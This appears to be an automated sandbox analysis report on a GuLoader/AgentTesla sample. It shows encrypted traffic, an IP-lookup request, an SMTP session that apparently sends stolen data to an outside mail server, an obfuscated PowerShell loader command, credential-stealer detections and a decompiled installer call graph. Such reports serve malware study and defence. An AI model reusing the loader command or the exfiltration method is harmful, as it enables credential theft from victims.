                                                                                            2024-11-05 15:36:55 UTC1328INData Raw: 3d aa 97 08 28 93 5c dd 60 8d e7 d6 2b a6 42 f3 a9 ee 96 d7 4c 81 e5 f1 9c 6f ca 44 59 10 95 21 36 a0 92 4f b6 20 4a cd 92 88 16 a5 6c b2 94 ac be e6 2e dd 6c 3e 00 e2 f7 e5 5e 4a 70 fd 47 fd f9 62 32 83 a5 4c be e9 c1 98 d8 eb f7 e8 e7 d2 2c ea e5 2c eb 71 1e 64 b1 64 87 15 a9 58 c8 c4 3f 42 73 5d b4 b2 57 a0 9f 83 dc d3 cb 07 7a ab c1 6b d0 ee 75 4d 11 9f 3d 5f e6 2e 5e 01 4f 07 f6 c7 07 46 6c ab 8d 4e 8f 20 94 77 55 ca e0 46 05 f8 fe 49 11 a0 43 41 e1 6b b8 3c 08 24 2e bc ef 13 a0 b3 01 85 7c 20 f3 43 d6 cd 33 1b da 5f 96 66 7a 24 5c 5f b0 da 69 4e 58 7e 1e dd 25 49 bb 05 9c d4 8c b3 3a 3b 92 c1 ba 4e 50 e9 e4 9d ed 4e b6 9a 7f 08 be a6 d4 81 4e dc 2a 2e c9 a5 0a 7f 1b e5 9b ed b5 d2 10 06 05 e8 a5 1b 7c 01 45 aa a7 f0 98 76 de 00 42 29 95 4b 96 bc 03
                                                                                            Data Ascii: =(\`+BLoDY!6O Jl.l>^JpGb2L,,qddX?Bs]WzkuM=_.^OFlN wUFICAk<$.| C3_fz$\_iNX~%I:;NPNN*.|EvB)K
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: e3 22 f4 e0 17 1b 4f df c6 54 88 73 57 67 19 87 90 bf a3 3f 7f 06 a4 04 17 6e 59 ba f0 3a 05 51 e3 51 63 36 24 24 21 87 db 63 4f 78 58 20 1e c7 99 43 2f 5d 05 a7 d9 83 78 f5 5c a8 24 25 ab 4a a6 85 fd e5 48 c3 71 33 d7 51 6a 43 f3 6b 4c c5 2d ea d6 27 61 8a a4 aa 2b af 58 0d 96 98 2e e4 7c 6a 7c cd 85 55 56 26 d3 ad 13 64 4d 66 68 a8 f6 69 c3 aa 0e c8 aa ca 14 0a 56 8b 2a 77 fd 8b e4 fb 32 0a 6a 9c 15 d0 65 4b 66 ee 43 5a cd 4d dd 28 00 8a 84 3d 2f 34 dd c4 4f 8b 97 ef 2d 86 04 7d e1 b3 3a 0e 55 b4 3e 18 72 1f f8 3e 82 ba a4 7a 85 44 0d 36 b8 86 cc cf f2 98 15 9e 1f 0c 07 41 0f 2b d3 82 57 5b bf f1 61 c5 d7 a8 f0 57 20 a0 fc 8e 4c d3 92 f9 a1 1c 60 68 f7 29 b5 77 dd 60 75 85 24 22 86 5b 99 57 ec 42 d6 75 94 d5 f3 9c 3b 50 41 59 18 b5 3b 27 80 92 b1 b8 2c
                                                                                            Data Ascii: "OTsWg?nY:QQc6$$!cOxX C/]x\$%JHq3QjCkL-'a+X.|j|UV&dMfhiV*w2jeKfCZM(=/4O-}:U>r>zD6A+W[aW L`h)w`u$"[WBu;PAY;',
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: b4 b0 26 b4 69 00 05 47 3c 32 c6 da 8d 5f 11 b8 4c f6 fd 7e 56 f2 b1 68 41 77 ad 11 dc 33 c7 e7 8d 5c ad f8 cc ab 67 2a c1 fc 87 2b 90 7e 36 c1 31 9a 3e 5b 8a e3 82 fd 4b 5b 0f 57 5b 80 ad f9 90 43 d1 31 e7 b0 af 8e e3 2d d6 db eb 62 3e ab 3a cd 0e 96 2f 6b cb 86 e9 8f ee 41 a7 20 fc 5b 1a 36 2d 50 31 c0 83 97 d3 7a 16 77 33 64 3e b2 70 4b c3 d7 5c 06 5f 08 e4 6a 45 b0 63 52 85 6d 8b 33 d1 34 ea a6 51 c9 48 39 9c ff bd 93 1d fc f0 6d 46 19 1e cb a0 97 3b 1f c4 d7 58 24 d8 fa b3 61 27 c5 25 3b 99 f4 22 f4 e0 9b 91 4e df 9e a4 a8 77 5d 99 17 79 9e 9b a9 3f 81 0a 5e 0a 3b 65 59 44 fc c8 04 48 ef 51 63 36 24 28 1b a0 f3 3d 4f 86 5f 1f 86 bd da 43 0f 55 25 a6 d9 7d 76 a8 7c a9 da 29 af 12 0b ca fd e5 49 c3 7e 0d d9 71 76 43 cb ec b3 cb 21 ca dc d9 6d 86 5a 84
                                                                                            Data Ascii: &iG<2_L~VhAw3\g*+~61>[K[W[C1-b>:/kA [6-P1zw3d>pK\_jEcRm34QH9mF;X$a'%;"Nw]y?^;eYDHQc6$(=O_CU%}v|)I~qvC!mZ
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: 48 48 54 dd 5b 36 68 65 66 06 b6 a1 5c 7d 5a 19 83 9d 79 91 16 cb cb 64 2d f9 e5 76 28 58 a6 5a 5f a3 dd 1c cc 40 68 6f 82 94 0a 29 6e 47 be 62 3e 98 68 41 6b 48 4a 32 08 2e 09 b4 21 5c 12 2d 05 e0 e0 10 db 1d 81 53 b9 1d 7d 3e de d7 3c 61 5a d6 78 7d b2 2d e7 a1 63 7b 49 bf bb 75 fa 65 77 8c 4c 9e 0a c4 0e 2c aa 93 3d 34 a7 8a 75 94 da c3 9e 0b 84 13 b4 25 08 b7 53 6f 5e e8 5d 14 94 ea 35 ee d2 5f 70 66 3b 28 fe e6 5e 62 ae c5 54 82 84 cd e1 a0 33 1a 49 84 91 a9 af 39 79 ff fb 94 57 e0 82 8c 41 94 4c 28 b7 69 fe f5 4f 3f 32 18 d4 89 5f 31 46 4d cf ec 80 57 cb 45 64 41 77 53 3f dc 33 e7 e4 73 52 a9 06 c2 56 6b 2e 3f d0 86 2b b0 7b c8 c0 08 61 3f 62 9c db 87 fd b5 57 37 18 5a 73 53 07 dc 93 2e e4 19 80 a9 8e e3 2d 37 d5 bd 16 3e 53 37 ce 0e b7 3d 5b c8 86
                                                                                            Data Ascii: HHT[6hef\}Zyd-v(XZ_@ho)nGb>hAkHJ2.!\-S}><aZx}-c{IuewL,=4u%So^]5_pf;(^bT3I9yWAL(iO?2_1FMWEdAwS?3sRVk.?+{a?bW7ZsS.-7>S7=[
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: ce 49 5f d2 3c 49 3c 0b 9a da 2a e1 98 03 7b 6c 1d a4 30 64 06 c7 66 6c a1 71 0c cf ce 8c 49 e4 99 0b f2 bf 0e 6d 66 f2 00 a9 dc 47 bc c3 32 ce 7d 40 fc 7c 5a 65 9a b4 76 01 e6 90 a7 db 1d c4 2a 61 32 b3 d3 34 3a 33 40 fa a0 1a 6d ea e7 e8 b1 7c c8 25 9c 8c 9c 4c 26 71 d1 68 9f ff 7f d0 48 78 8c 5d 6d 75 fd 57 01 fa 87 4a 79 9c e8 d3 94 53 f3 a7 1c c7 f9 22 ea 25 c2 f0 be f2 84 22 8a 26 20 e5 18 35 dd d9 3f 3a ab 57 25 7b df 06 54 81 7f 83 a0 34 f7 f0 c0 66 2f 84 87 8b 6e 7e 4e 2d 5d d2 a3 04 81 46 49 4b fd 50 36 40 64 98 08 f2 a0 5c 83 45 1a 83 bd 72 91 16 cb 37 65 14 d9 92 77 28 a6 d8 5a 5f d8 57 1d cc 44 85 62 83 94 71 4e 6e 47 a9 3d 78 98 71 46 4b 44 44 32 08 c1 27 b7 21 5c ec df 08 e3 c0 20 de 1c 81 ad b8 da 7f 3d de f7 07 cf 5a d6 86 5c 82 32 e7 a1
                                                                                            Data Ascii: I_<I<*{l0dflqImfG2}@|Zev*a24:3@m|%L&qhHx]muWJyS"%"& 5?:W%{T4f/n~N-]FIKP6@d\Er7ew(Z_WDbqNnG=xqFKDD2'!\ =Z\2
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: a9 de 7d 91 d2 a4 d0 5f 7d 56 75 41 e8 38 87 1b 9f ea 05 26 9c 88 a7 36 43 67 16 00 de db d3 d5 bb 02 bb 9f c6 16 19 40 ff ae 14 42 d2 59 d4 f2 d2 72 f3 e6 0c d2 a9 67 4f 9a d0 b1 82 d5 c4 14 47 52 1f 0f 6d 4e f3 2e 65 66 65 2b f3 df 07 6c cd b0 3a 82 a6 d1 c2 b3 03 64 1d ff 0c 32 dc 88 ef 7d aa 57 bf 7a 59 26 40 3f 6d 84 a0 17 8b 9f ec 44 8c 52 b8 bf d3 1d e0 bb 59 16 29 cf ab 64 33 ed b0 d1 0c 10 0b b3 27 3b 99 d1 51 12 1d 9b 8b 86 fc 13 4c 10 74 64 0a 7a 03 69 b6 8e 0b 90 7a e0 c7 50 94 53 1a ce 49 65 d2 3c 49 ae 22 d7 da b8 e6 b8 00 85 6c 1d 5a 24 64 06 c7 b8 64 a1 71 2c 30 c0 8f 49 1a 66 3e e6 bf 2e 64 98 fb 00 57 a6 0f ab c3 36 a1 b9 49 fc 7a 01 03 9a b4 72 c6 82 91 a7 db c3 c2 2a 61 12 4d dd 37 3a cd bf cf a9 1a 4d ec e7 c8 b0 82 c9 1c 47 82 9c 4c
                                                                                            Data Ascii: }_}VuA8&6Cg@BYrgOGRmN.efe+l:d2}WzY&@?mDRY)d3';QLtdzizPSIe<I"lZ$ddq,0If>.dW6Izr*aM7:MGL
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: f5 6b 41 61 28 b5 fe d5 8f 56 e6 bf 8e 7f cc d5 7c 95 1d 70 05 38 77 c9 b6 dc a3 7b 41 e8 e3 b4 27 1e 13 85 b1 f7 e0 8d 70 2c a2 a0 96 43 db 78 08 87 44 5a dc 2c 20 42 bf b2 db 75 94 86 2c e6 6c 3f 77 d4 96 83 7d c4 bb e3 12 e0 9d e1 aa d8 81 36 f8 33 08 58 dd ac e4 77 ac dc f2 2f 55 31 53 c9 a2 a6 2d ba 86 41 12 56 6e fe 91 f3 16 fa ac e2 e4 95 e3 6d 8c bd 4b 85 54 89 b9 7c e3 3c 1a ca cc e2 fe 80 c5 d1 73 4a 44 3f 9a 2d 05 aa 7d c9 b5 7b 1c 54 46 cd df 71 41 da 10 9e 44 d3 bd f7 d2 1b c2 0e c4 ad de 7d 91 d2 21 aa 5e 7d 7a 43 37 e8 3e e2 45 9b ea 0f 0e 7e 86 a7 3c 3e ed 1a 00 da db be d5 bb 02 bb 90 ff 1c 19 be f3 ae 34 63 b2 59 d4 0c 22 73 ca f1 f2 de a9 99 66 9f d0 91 a2 2b c5 2d 02 9c 0f 0f 55 6b 92 2e 65 5e c9 da 0c 20 2d 92 c1 b0 29 92 cb d1 7f b3
                                                                                            Data Ascii: kAa(V|p8w{A'p,CxDZ, Bu,l?w}63Xw/U1S-AVnmKT|<sJD?-}{TFqAD}!^}zC7>E~<>4cY"sf+-Uk.e^ -)
                                                                                            2024-11-05 15:36:55 UTC1378INData Raw: 6e fb 48 4d 06 fe ff 8a de 77 55 bf bf ff eb a0 7f f6 1e 7c cd b6 7f 8d 85 ea e5 92 54 ea 2a 37 cf c3 54 49 af ef b5 77 a1 a0 6b 5e 64 ff 46 f1 bb 6a a7 c9 82 9a 6f f9 7d 71 f7 7a 01 de 43 c1 5f 6b ba 3c f6 f1 15 e0 e6 33 4f 34 f4 6d de cb 92 f5 14 3f bb f7 d3 99 43 0f 7d 56 e1 f3 4f bf a8 b4 ca f8 fd 21 65 54 a5 36 cd 38 da 4d 86 7e 4d 43 62 57 9f 7f fc de ef a1 ed db 4c ae f7 4f d4 e1 28 f9 e0 c9 f8 5d 50 a3 90 11 79 f2 0b c9 8f d8 31 82 12 db d3 89 11 cb 12 1b b0 77 c4 2f 63 d0 49 37 d4 12 2e 0f 11 35 11 47 cc 8c 7f 83 76 96 97 92 7f 32 de 5e d8 ea 8e fe e7 71 cd b6 dc 5d 8b 4f ea e3 4a d5 12 11 a5 9a f7 e0 8d 8e d3 9a 93 9c 43 db 52 28 ab 45 5a dc d2 d0 4c bd b2 25 87 98 84 0c 84 64 3f 77 2a 69 bb 53 c1 bb e3 ec d1 99 e1 8a aa b9 d7 05 8c e8 75 dd ac
                                                                                            Data Ascii: nHMwU|T*7TIwk^dFjo}qzC_k<3O4m?C}VO!eT68M~MCbWLO(]Py1w/cI7.5Gv2^q]OJCR(EZL%d?w*iSu


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.849712104.26.13.2054437048C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 15:36:57 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-05 15:36:57 UTC399INHTTP/1.1 200 OK
                                                                                            Date: Tue, 05 Nov 2024 15:36:57 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8dddec2019dba915-DFW
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1364&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=2458404&cwnd=186&unsent_bytes=0&cid=399a9f5a0320ab07&ts=430&x=0"
                                                                                            2024-11-05 15:36:57 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                                            Data Ascii: 173.254.250.76


                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Nov 5, 2024 16:37:00.994605064 CET58749714208.91.199.223192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                            Nov 5, 2024 16:37:00.995031118 CET49714587192.168.2.8208.91.199.223EHLO 116938
                                                                                            Nov 5, 2024 16:37:01.151644945 CET58749714208.91.199.223192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                            250-PIPELINING
                                                                                            250-SIZE 41648128
                                                                                            250-VRFY
                                                                                            250-ETRN
                                                                                            250-STARTTLS
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-AUTH=PLAIN LOGIN
                                                                                            250-ENHANCEDSTATUSCODES
                                                                                            250-8BITMIME
                                                                                            250-DSN
                                                                                            250 CHUNKING
                                                                                            Nov 5, 2024 16:37:01.155535936 CET49714587192.168.2.8208.91.199.223AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
                                                                                            Nov 5, 2024 16:37:01.315074921 CET58749714208.91.199.223192.168.2.8334 UGFzc3dvcmQ6
                                                                                            Nov 5, 2024 16:37:01.477303028 CET58749714208.91.199.223192.168.2.8235 2.7.0 Authentication successful
                                                                                            Nov 5, 2024 16:37:01.479490995 CET49714587192.168.2.8208.91.199.223MAIL FROM:<tech1@santonswitchgears.com>
                                                                                            Nov 5, 2024 16:37:01.637973070 CET58749714208.91.199.223192.168.2.8250 2.1.0 Ok
                                                                                            Nov 5, 2024 16:37:01.638397932 CET49714587192.168.2.8208.91.199.223RCPT TO:<tech1@santonswitchgears.com>
                                                                                            Nov 5, 2024 16:37:01.820481062 CET58749714208.91.199.223192.168.2.8250 2.1.5 Ok
                                                                                            Nov 5, 2024 16:37:01.820625067 CET49714587192.168.2.8208.91.199.223DATA
                                                                                            Nov 5, 2024 16:37:01.979985952 CET58749714208.91.199.223192.168.2.8354 End data with <CR><LF>.<CR><LF>
                                                                                            Nov 5, 2024 16:37:01.980690956 CET49714587192.168.2.8208.91.199.223.
                                                                                            Nov 5, 2024 16:37:02.274764061 CET58749714208.91.199.223192.168.2.8250 2.0.0 Ok: queued as B3F92500244

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:10:36:14
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\REnBTVfW8q.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'157'372 bytes
                                                                                            MD5 hash:E6A0BB6BCAF44FBCC341EF4C93482059
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:10:36:17
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "
                                                                                            Imagebase:0xe40000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1647881409.000000000C7EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1641405594.0000000006319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:10:36:17
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:10:36:37
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                            Imagebase:0xda0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21%
                                                                                              Total number of Nodes:1358
                                                                                              Total number of Limit Nodes:24
                                                                                              execution_graph 3270 4015c1 3271 402c37 17 API calls 3270->3271 3272 4015c8 3271->3272 3290 405d2c CharNextW CharNextW 3272->3290 3274 401631 3276 401663 3274->3276 3277 401636 3274->3277 3275 405cae CharNextW 3283 4015d1 3275->3283 3280 401423 24 API calls 3276->3280 3296 401423 3277->3296 3287 40165b 3280->3287 3283->3274 3283->3275 3286 401617 GetFileAttributesW 3283->3286 3288 4015fa 3283->3288 3300 40597d 3283->3300 3308 405960 CreateDirectoryW 3283->3308 3285 40164a SetCurrentDirectoryW 3285->3287 3286->3283 3288->3283 3303 4058e3 CreateDirectoryW 3288->3303 3291 405d49 3290->3291 3295 405d5b 3290->3295 3292 405d56 CharNextW 3291->3292 3291->3295 3293 405d7f 3292->3293 3293->3283 3294 405cae CharNextW 3294->3295 3295->3293 3295->3294 3297 405414 24 API calls 3296->3297 3298 401431 3297->3298 3299 4063b0 lstrcpynW 3298->3299 3299->3285 3311 40678a GetModuleHandleA 3300->3311 3304 405930 3303->3304 3305 405934 GetLastError 3303->3305 3304->3288 3305->3304 3306 405943 SetFileSecurityW 3305->3306 3306->3304 3307 405959 GetLastError 3306->3307 3307->3304 3309 405974 GetLastError 3308->3309 3310 405970 3308->3310 3309->3310 3310->3283 3312 4067b0 GetProcAddress 3311->3312 3313 4067a6 3311->3313 3314 405984 3312->3314 3317 40671a GetSystemDirectoryW 3313->3317 3314->3283 3316 4067ac 3316->3312 3316->3314 3318 40673c wsprintfW LoadLibraryExW 3317->3318 3318->3316 3330 401e43 3338 402c15 3330->3338 3332 401e49 3333 402c15 17 API calls 3332->3333 3334 401e55 3333->3334 3335 401e61 ShowWindow 3334->3335 3336 401e6c EnableWindow 3334->3336 3337 402abf 3335->3337 3336->3337 3339 4063d2 17 API calls 3338->3339 3340 402c2a 3339->3340 3340->3332 4002 402644 4003 402c15 17 API calls 4002->4003 4004 402653 4003->4004 4005 40269d ReadFile 4004->4005 4006 405f25 ReadFile 4004->4006 4008 402792 4004->4008 4009 4026dd MultiByteToWideChar 4004->4009 4011 402703 SetFilePointer MultiByteToWideChar 4004->4011 4012 4027a3 4004->4012 4014 402790 4004->4014 4015 405f83 SetFilePointer 4004->4015 4005->4004 4005->4014 4006->4004 4024 4062f7 wsprintfW 4008->4024 4009->4004 4011->4004 4013 4027c4 SetFilePointer 4012->4013 4012->4014 4013->4014 4016 405fbb 4015->4016 4017 405f9f 4015->4017 4016->4004 4018 405f25 ReadFile 4017->4018 4019 405fab 4018->4019 4019->4016 4020 405fc4 SetFilePointer 4019->4020 4021 405fec SetFilePointer 4019->4021 4020->4021 4022 405fcf 4020->4022 4021->4016 4023 405f54 WriteFile 4022->4023 4023->4016 4024->4014 4025 402348 4026 402c37 17 API calls 4025->4026 4027 402357 4026->4027 4028 402c37 17 API calls 4027->4028 4029 402360 4028->4029 4030 402c37 17 API calls 4029->4030 4031 40236a GetPrivateProfileStringW 4030->4031 3717 4039cc 3718 4039e7 3717->3718 3719 4039dd CloseHandle 3717->3719 3720 4039f1 CloseHandle 3718->3720 3721 4039fb 3718->3721 3719->3718 3720->3721 3726 403a29 3721->3726 3727 403a37 3726->3727 3728 403a00 3727->3728 3729 403a3c FreeLibrary GlobalFree 3727->3729 3730 405abe 3728->3730 3729->3728 3729->3729 3731 405d89 18 API calls 3730->3731 3732 405ade 3731->3732 3733 405ae6 DeleteFileW 3732->3733 3734 405afd 3732->3734 3762 403a0c 3733->3762 3739 405c1d 3734->3739 3766 4063b0 lstrcpynW 3734->3766 3736 405b23 3737 405b36 3736->3737 3738 405b29 lstrcatW 3736->3738 3741 405ccd 2 API calls 3737->3741 3740 405b3c 3738->3740 3742 4066f3 2 API calls 3739->3742 3739->3762 3743 405b4c lstrcatW 3740->3743 3745 405b57 lstrlenW FindFirstFileW 3740->3745 3741->3740 3744 405c42 3742->3744 3743->3745 3746 405c81 3 API calls 3744->3746 3744->3762 3745->3739 3764 405b79 3745->3764 3747 405c4c 3746->3747 3749 405a76 5 API calls 3747->3749 3748 405c00 FindNextFileW 3752 405c16 FindClose 3748->3752 3748->3764 3751 405c58 3749->3751 3753 405c72 3751->3753 3754 405c5c 3751->3754 3752->3739 3756 405414 24 API calls 3753->3756 3757 405414 24 API calls 3754->3757 3754->3762 3756->3762 3759 405c69 3757->3759 3758 405abe 60 API calls 3758->3764 3761 406176 36 API calls 3759->3761 3760 405414 24 API calls 3760->3748 3761->3762 3763 405414 24 API calls 3763->3764 3764->3748 3764->3758 3764->3760 3764->3763 3765 406176 36 API calls 3764->3765 3767 4063b0 lstrcpynW 3764->3767 3768 405a76 3764->3768 3765->3764 3766->3736 3767->3764 3776 405e7d GetFileAttributesW 3768->3776 3770 405aa3 3770->3764 3772 405a91 RemoveDirectoryW 3774 405a9f 3772->3774 3773 405a99 DeleteFileW 3773->3774 3774->3770 3775 405aaf SetFileAttributesW 3774->3775 3775->3770 3777 405a82 3776->3777 3778 405e8f SetFileAttributesW 3776->3778 3777->3770 3777->3772 3777->3773 3778->3777 4035 4016cc 4036 402c37 17 API calls 4035->4036 4037 4016d2 GetFullPathNameW 4036->4037 4038 4016ec 4037->4038 4044 40170e 4037->4044 4041 4066f3 2 API calls 4038->4041 4038->4044 4039 401723 GetShortPathNameW 4040 402abf 4039->4040 4042 4016fe 4041->4042 4042->4044 4045 4063b0 lstrcpynW 4042->4045 4044->4039 4044->4040 4045->4044 4046 401b4d 4047 402c37 17 API calls 4046->4047 4048 401b54 4047->4048 4049 402c15 17 API calls 4048->4049 4050 401b5d wsprintfW 4049->4050 4051 402abf 4050->4051 4052 4047cd 4053 404803 4052->4053 4054 4047dd 4052->4054 4055 4043ac 8 API calls 4053->4055 4056 404345 18 API calls 4054->4056 4057 40480f 4055->4057 4058 4047ea SetDlgItemTextW 4056->4058 4058->4053 4059 401f52 4060 402c37 17 API calls 4059->4060 4061 401f59 4060->4061 4062 4066f3 2 API calls 4061->4062 4063 401f5f 4062->4063 4065 401f70 4063->4065 4066 4062f7 wsprintfW 4063->4066 4066->4065 3914 405553 3915 405574 GetDlgItem GetDlgItem GetDlgItem 3914->3915 3916 4056fd 3914->3916 3960 40437a SendMessageW 3915->3960 3917 405706 GetDlgItem CreateThread CloseHandle 3916->3917 3918 40572e 3916->3918 3917->3918 3963 4054e7 5 API calls 3917->3963 3921 405759 3918->3921 3922 405745 ShowWindow ShowWindow 3918->3922 3923 40577e 3918->3923 3920 4055e4 3926 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 3920->3926 3924 405765 3921->3924 3925 4057b9 3921->3925 3962 40437a SendMessageW 3922->3962 3930 4043ac 8 API calls 3923->3930 3928 405793 ShowWindow 3924->3928 3929 40576d 3924->3929 3925->3923 3933 4057c7 SendMessageW 3925->3933 3931 405659 3926->3931 3932 40563d SendMessageW SendMessageW 3926->3932 3935 4057b3 3928->3935 3936 4057a5 3928->3936 3934 40431e SendMessageW 3929->3934 3941 40578c 3930->3941 3938 40566c 3931->3938 3939 40565e SendMessageW 3931->3939 3932->3931 3940 4057e0 CreatePopupMenu 3933->3940 3933->3941 3934->3923 3937 40431e SendMessageW 3935->3937 3942 405414 24 API calls 3936->3942 3937->3925 3944 404345 18 API calls 3938->3944 3939->3938 3943 4063d2 17 API calls 3940->3943 3942->3935 3945 4057f0 AppendMenuW 3943->3945 3946 40567c 3944->3946 3947 405820 TrackPopupMenu 3945->3947 3948 40580d GetWindowRect 3945->3948 3949 405685 ShowWindow 3946->3949 3950 4056b9 GetDlgItem SendMessageW 3946->3950 3947->3941 3951 40583b 3947->3951 3948->3947 3952 4056a8 3949->3952 3953 40569b ShowWindow 3949->3953 3950->3941 3954 4056e0 SendMessageW SendMessageW 3950->3954 3955 405857 SendMessageW 3951->3955 3961 40437a SendMessageW 3952->3961 3953->3952 3954->3941 3955->3955 3956 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3955->3956 3958 405899 SendMessageW 3956->3958 3958->3958 3959 4058c2 GlobalUnlock SetClipboardData CloseClipboard 3958->3959 3959->3941 3960->3920 3961->3950 3962->3921 4067 402253 4068 402c37 17 API calls 4067->4068 4069 402259 4068->4069 4070 402c37 17 API calls 4069->4070 4071 402262 4070->4071 4072 402c37 17 API calls 4071->4072 4073 40226b 4072->4073 4074 4066f3 2 API calls 4073->4074 4075 402274 4074->4075 4076 402285 lstrlenW lstrlenW 4075->4076 4077 402278 4075->4077 4079 405414 24 API calls 4076->4079 4078 405414 24 API calls 4077->4078 4081 402280 4077->4081 4078->4081 4080 4022c3 SHFileOperationW 4079->4080 4080->4077 4080->4081 4082 401956 4083 402c37 17 API calls 4082->4083 4084 40195d lstrlenW 4083->4084 4085 40258c 4084->4085 4086 401d57 GetDlgItem GetClientRect 4087 402c37 17 API calls 4086->4087 4088 401d89 LoadImageW SendMessageW 4087->4088 4089 401da7 DeleteObject 4088->4089 4090 402abf 4088->4090 4089->4090 4091 402dd7 4092 402e02 4091->4092 4093 402de9 SetTimer 4091->4093 4094 402e50 4092->4094 4095 402e56 MulDiv 4092->4095 4093->4092 4096 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 4095->4096 4096->4094 4098 4014d7 4099 402c15 17 API calls 4098->4099 4100 4014dd Sleep 4099->4100 4102 402abf 4100->4102 4103 4022d7 4104 4022de 4103->4104 4107 4022f1 4103->4107 4105 4063d2 17 API calls 4104->4105 4106 4022eb 4105->4106 4108 405a12 MessageBoxIndirectW 4106->4108 4108->4107 4109 404459 lstrcpynW lstrlenW 4117 40175c 4118 402c37 17 API calls 4117->4118 4119 401763 4118->4119 4120 405ed1 2 API calls 4119->4120 4121 40176a 4120->4121 4121->4121 4122 4023de 4123 